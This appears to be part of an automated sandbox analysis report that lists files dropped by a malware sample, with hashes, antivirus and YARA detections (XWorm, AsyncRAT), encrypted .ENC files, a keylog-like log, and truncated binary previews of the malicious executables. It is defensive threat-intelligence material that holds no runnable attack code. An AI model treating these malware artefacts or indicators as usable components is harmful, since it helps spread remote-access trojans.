                                                                                        Preview:..-Q.=..'R.....<...I..7..C...8..FJ^D.<VB.....1\.....|:....{.c.....).3...+..,.-..........*.Y.L.\8]l'.p.} |..K..;..^...ap..\k.qw.....i.#z-4\=E...7.%.7..^.........z...ON=..NH;.q.!p.MX'.9DQ.....I.:B.w@`?3S.A."5m.&P!m.d.9j..Jip.L....V>.t.(S...3...:?..$%..pa.@..iD.j...Gi..UUP![..M....4.[&K.'...~)i3.".....`.;..:.O.Zm0...r.`%1....2oA..pL...~.h..T[>.TZ,!L..n$..r...LGI...gFB....BA.t..D\...M...X%.`y.o.2......1.ma......Qg..". .AHQH?.ch.</...BY...mp...iL......fN.......Ho....[[..$Xy..{...e....

                                                                                        C:\Users\user\AppData\Local\Temp\9925478147.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.615583535461157
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:ouU/z3FWCG68e0Zd4haf31Zd7ZiU7pwrDBI24ihvtpRDY/:ouUDFhGurhKXvzqBI2r1jDy
                                                                                        MD5:7819048C885594573AEE30037A3F1C0D
                                                                                        SHA1:E52CEBA1CC9CA591B7A64F777BF623B3C5C48324
                                                                                        SHA-256:6FA176F14A99CD6B166DD340C160E923960440E44B3FCF9938E9469067F26F9A
                                                                                        SHA-512:BB7AF63FD0C47E966E697FA0284612AC2B6FC0C5C1AFDFACD5F4E43AF871C151644EDA91969347764E19EE2B2BDC1701997045EF6100FA334094840008B41632
                                                                                        Malicious:false
                                                                                        Preview:...,.....[z..0,.Th...v6|....S.XN.T. ........,.i..^...X.)........i.1...!.E/.P.MW.".p";+.<....(gA..ug..#.HW..q.p.|....@....H;(-..2.(......D..k.JC....SQ/....fdB.a..Fh.m*.e'....M..B,.a.hyqur.`..F..g5..~..;c.*.gI*G....._....3..[...s&aK*...-s....0=k..@Y..o!.+..8.VPh.P...c..e.....)?.65..}.D..+.<...f4..qP%.2.Tu8.._.u..u..V....hx1......i(.U..w+W.....N..i..b0z.W.....&:o.i.R.GU..fd.K....T}eH.*J~y..\@^...q....r.`.q..L@Z..x..:Ib..x.}....w.C...0...n.E......if.[.Td.t..s....}A\.R.~2.|.2...d(........

                                                                                        C:\Users\user\AppData\Local\Temp\AdobeARM.log.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4288
                                                                                        Entropy (8bit):7.963810899988569
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:au9/0zk4gft9jICAh2wYt63kTwaNRvYcXy9qtCq9YiZtpg0v3:a5kjt9PAAwHkTwabhi3q9zeS
                                                                                        MD5:0DDC06E3AFD07A473C5F9612706BAF94
                                                                                        SHA1:6B54C16A482B75AD34C39E01858344DA241E1594
                                                                                        SHA-256:5E53C4B10031EB40E87A48125795E3038633348CB12E0B2B853C7FD6E7838623
                                                                                        SHA-512:402CDC02D793701C29C86B3A7419FBDBCCE3BB8BD8B42AD86DFB5B4C78CABADA40B6F8EAFC8CAE9C3929EACFE557158FF681A0E391D855991059659A293A5C9D
                                                                                        Malicious:false
                                                                                        Preview:5.M.W*.........1.....^A.....@.zV .W.i.......N..QW..j..+...w`BZ..oA..n..q.d...A.=.:G~..|u".....oZ~b..p".. .%e...[.:..q+8..n0.tE-.>..[..g.7....F.'i...2.#.M..9.c.......rg...L.s..6.!6.K....+PR(\...7.....p..4...OP..f.)..dut..|....c../.V1..uj.4.,.......a.........S..yy....cd4Pl...@.%.J..E)...Tv.p.g.E..f.:..Y?3............%..#np.,.^.O...>>+.'...i..m...*..n.?.......`.J..........o...*8}.......\.b......E.(Q...@......Y........R....). ...M..A....?...:X..![..p%..*..Z.1 "<....9.kC.p;h.y.......U..]...D/.r......t..W.b.{...nQ.4|.).]m.....$..b7.../~H.Q..*..p.Lv..R.\..1N.p.....|D.W?.O`.........&$.....4.RA?.z.....F.*.._.7u.].....^VX"..8....8$VZ..@...].av6.i.4.....8......]........03..c...U....w+.o.......g.}?...3..H......).|gdx......i....M....R..P...%...h.Gi|.V..6?..{......yqV.F.#.....*.5.Z..@....'..... ..cm......lP.....J.'o..s..U.E.3..L".\.......o{1....S..e.Ir...o.N.DdR.F.."=x.&.......Fk......-........|].-u"..Q%.~.......T.h.;=./...1..N]!.QR..8o+....Z.

                                                                                        C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\8svMXMXNRn.exe
                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):815104
                                                                                        Entropy (8bit):5.604569276886218
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:jHeLH6iTPSE54sgweI9oaQaj3T+piq+77xOZ+eMm:jHeLHdTSEeyoaQaj3apiq+77xd
                                                                                        MD5:4B94B989B0FE7BEC6311153B309DFE81
                                                                                        SHA1:BB50A4BB8A66F0105C5B74F32CD114C672010B22
                                                                                        SHA-256:7C4283F5E620B2506BCB273F947DEF4435D95E143AE3067A783FD3ADC873A659
                                                                                        SHA-512:FBBE60CF3E5D028D906E7D444B648F7DFF8791C333834DB8119E0A950532A75FDA2E9BD5948F0B210904667923EB7B2C0176140BABC497955D227E7D80FB109D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: RHUENHera1.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Z.f.........."......f..........F.... ....@...... ....................................`.....................................................T.......u...........................................................................T................ ..H............text...dd... ...f.................. ..`.rsrc...u............h..............@..@.reloc...............n..............@..BH.......$....u...........................................................0............(....r...p(....s......r...po...........9.....o.....r:..p(....9....r:..p(.....(....9c...r:..p.(....s.....s.....o......o......rJ..po.....o....rl..prz..po.....r...p.o....&......9.....o..........&..............(....o......(....o....o...... .<..(...........s....(...........(......(....r...p(....(........r...p..o....r,..p(....(........9,.....(....: ...r6..p(.... ....(......(....8..........(....9....*.#(..

                                                                                        C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):819200
                                                                                        Entropy (8bit):5.598226996524291
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:t0zVvgDNMoWjTmFzAzBocaKjyWtiR1pptHxQ0z:O5vgHWjTwAlocaKjyyItHDz
                                                                                        MD5:2A4DCF20B82896BE94EB538260C5FB93
                                                                                        SHA1:21F232C2FD8132F8677E53258562AD98B455E679
                                                                                        SHA-256:EBBCB489171ABFCFCE56554DBAEACD22A15838391CBC7C756DB02995129DEF5A
                                                                                        SHA-512:4F1164B2312FB94B7030D6EB6AA9F3502912FFA33505F156443570FC964BFD3BB21DED3CF84092054E07346D2DCE83A0907BA33F4BA39AD3FE7A78E836EFE288
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Ll.g.........."......v............... ....@...... ....................................`.................................................D...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH........................................................................0..R.......(....:....*r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&*.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o......*.......8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(......*.....(....~....%:....&~......*...s....%.....(...+*...0..l.........(....r...p(....(....r\..p.

                                                                                        C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\8svMXMXNRn.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):78848
                                                                                        Entropy (8bit):6.001807285203909
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:phkwqMfG4mxj/ilUBYrOAr+bRdTmxjefARv6tLEOgSq6pK1PboR:JqcS/HBYrOAr+bRcxjeY6EO1puM
                                                                                        MD5:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        SHA1:FA69E1C57709DFA076E792509E6C77D297E47664
                                                                                        SHA-256:5CB0406BE361324ECAEAA54238D82B24DFFDFFF8AE35DD2A59301E83E71D9D79
                                                                                        SHA-512:8628CBAC85E04D9F0ADA20E6F46C74D3E22EDDA7095043E1F61BCFD7836B54F29F4DDE6DE6C72309FD8F7CF66A2D69D1FE7288914A213C35B1D40F7D98E4271C
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................*...........I... ...`....@.. ....................................@.................................tI..W....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................I......H.......Pm..$.......&.....................................................(....*.r...p*. O...*..(....*.r}..p*. h...*.s.........s.........s.........s.........*.r...p*. .(T.*.r9..p*. .\=.*.r...p*. *p{.*.r...p*. y!k.*.rS..p*. ...*..((...*.r...p*. ....*.r...p*. .r..*"(....+.*&(....&+.*.+5sd... .... .'..oe...(,...~....-.(J...(<...~....of...&.-.*.r3..p*. ..".*.r...p*. .i*.*.r...p*. u3..*.rM..p*. ....*.r...p*. .x!.*.r...p*. ~.H.*.rg..p*. ....*..............j..................sg....

                                                                                        C:\Users\user\AppData\Local\Temp\DISCORD

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):103
                                                                                        Entropy (8bit):3.9770111444684244
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm
                                                                                        MD5:487AB53955A5EA101720115F32237A45
                                                                                        SHA1:C59D22F8BC8005694505ADDEF88F7968C8D393D3
                                                                                        SHA-256:D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368
                                                                                        SHA-512:468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C
                                                                                        Malicious:false
                                                                                        Preview:{. "args" : {. "code" : "xRCaC7cdBn". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

                                                                                        C:\Users\user\AppData\Local\Temp\Hamster.mp3

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\voosiq.exe
                                                                                        File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                        Category:dropped
                                                                                        Size (bytes):2220942
                                                                                        Entropy (8bit):7.979004541022797
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:XTG0fzQNwSQDm681Eyi98KE1gB4hTcmxAYPOdM/tgB6w5N4:jFzQSSD71EN3Wh4iAe/qB6b
                                                                                        MD5:1A7155C17D58427879FBCEE961DF0FAF
                                                                                        SHA1:655D78A73FD07C97EAA06A4A358419AF8719D630
                                                                                        SHA-256:2C716F935BFF0B8CDE906F2144C91FB70DCC5914C11C54423F3F10290A1795B7
                                                                                        SHA-512:1F75E168D8C61F45C3635A0A38627CA2F8CCBF89971EAA43212D97BCD42FEA012428EB61660B1ACC0D2EF0C90D9B6EB6D3A2B066470CB3709323CC4C8AD554E4
                                                                                        Malicious:false
                                                                                        Preview:....ftypisom....isomiso2mp41.._.moov...lmvhd...................&................................................@.................................^.trak...\tkhd.......................&................................................@..............$edts....elst...........&..........^Jmdia... mdhd...............D.\\.U......Ghdlr........soun............ISO Media file produced by Google Inc....].minf....smhd...........$dinf....dref............url ......].stbl....stsd...........ymp4a.........................D.....Aesds........0......."@...........................................btrt................stts...................4stsc..............................................\pstsz...............s...................m...m...h...............s...g...g...............Y...Z...]...]...k...i...m...h.......{...........................h...q...T...h...n.......S...X...m...d...q...j...d...f...b...h...f...f...n...i...k...o...u...z...............w...................c...c...z.......4...,...E...X...M...M...X...Y

                                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):41
                                                                                        Entropy (8bit):3.7195394315431693
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                        MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                        SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                        SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                        SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                                        C:\Users\user\AppData\Local\Temp\TrojanXD.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\voosiq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):14848
                                                                                        Entropy (8bit):5.373167409076013
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:hNjhj89FwosmBvOZvbkVadM/UgmptYcFwVc03K:PdoLwo1Bkvb1yitYcFwVc6K
                                                                                        MD5:9776B41CC11329E32CA35A161F0AF774
                                                                                        SHA1:307FA631EF36F00540C27565BF6ADAEC8ED4CEEF
                                                                                        SHA-256:C982E9C712DD27F31CC419EC6B420238E83587B6E021DA256568C9237D01944C
                                                                                        SHA-512:172585383A63B99693CA386F683055E92152C28CD0E9A3C643DFA61A4147CC600CA69D7B79093217F0CC020590614C88FA8DF8026DACFB8B6EEB7EB1BED65487
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.^..........."...0..&...........D... ...`....@.. ....................................`..................................D..O....`..P............................C..8............................................ ............... ..H............text....$... ...&.................. ..`.rsrc...P....`.......(..............@..@.reloc...............8..............@..B.................D......H.......P,...............................................................0..&...............(....&..-..+..(.......&......*...................0..r.............(.....(....o........(....&s............s....s.....s..............s....s......s.......o.......o.......o.....*...0..N........ ..........r...p .....~......~....(........ ......~....(....&.(....&...&....*........)..H.......0..;.........s....}....(......(.....~....(......(......(........{.....{....(..........(................

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qo2vp3v.mzr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wfuorws.z4t.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40vrje1z.nnv.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dav3qlo.ebr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpusphmk.my3.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzbnfcle.yo4.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddv2y5.ik1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4wdzxz5.5mk.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxh04bci.kh1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqf0arbo.jve.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1walyv5.xch.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvpcdrn1.c4g.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgitn5y1.2yy.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

